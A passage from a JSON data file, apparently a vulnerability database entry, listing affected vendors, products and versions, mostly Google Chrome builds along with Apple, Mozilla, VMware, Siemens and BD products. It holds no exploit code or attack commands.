"vendor": "apple", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.227" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.302" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.63" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.59" }, { "model": "gencell clic", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.647.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.937.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.90" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.123" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.26" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.3" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.71" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.1" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.136" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.27" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "50" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.12" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.867.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.329" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.746.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.38" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.12" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.19" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.753.0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.92" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1038.0" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.7" }, { "model": "phoenix", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "bactec fx", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.496.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.728.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.85" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.5.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.7" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.824.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.706.0" }, { "model": "lyse wash assistant", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.35" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.585.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.557.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.80" }, { "model": "enterprise linux eus compute node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.549.0" }, { "model": "macos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.12.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.111" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.13" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.207" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.440.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.343.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1053.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.957.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.4" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.52" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.573.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1055" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.806.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.13" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.863.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.652.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.29" }, { "model": "simatic ipc227e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.952.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1019" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.872.0" }, { "model": "simatic hmi comfort pro panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1022.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.36" }, { "model": "enterprise linux for ibm z systems", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "46.0.2490.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.341.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.11" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.223" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1657.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1273.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.46" }, { "model": "rowa vmax system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1274.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1303.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1015" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.714.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.8" }, { "model": "pyxis parx", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.22" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.230" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.67" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.942.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.50" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.128" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.720.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.904.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.114" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.212" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.116" }, { "model": "pyxis nursing data collection", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.22" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1052.0" }, { "model": "content analysis", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.1" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.305.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.89" }, { "model": "data innovations", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1034" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.145" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.646.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.697.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.222" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.593.0" }, { "model": "sql server for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "200840" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.100" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.20" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.339.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.70" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1031.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.626.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.37" }, { "model": "facslyric", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.708.0" }, { "model": "facscanto 10-color", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "google", "version": "v80" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.161" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.559.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.625.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.64" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1009.0" }, { "model": "facsduet sample prep", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.326" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.659.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.881.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.800.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37599" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 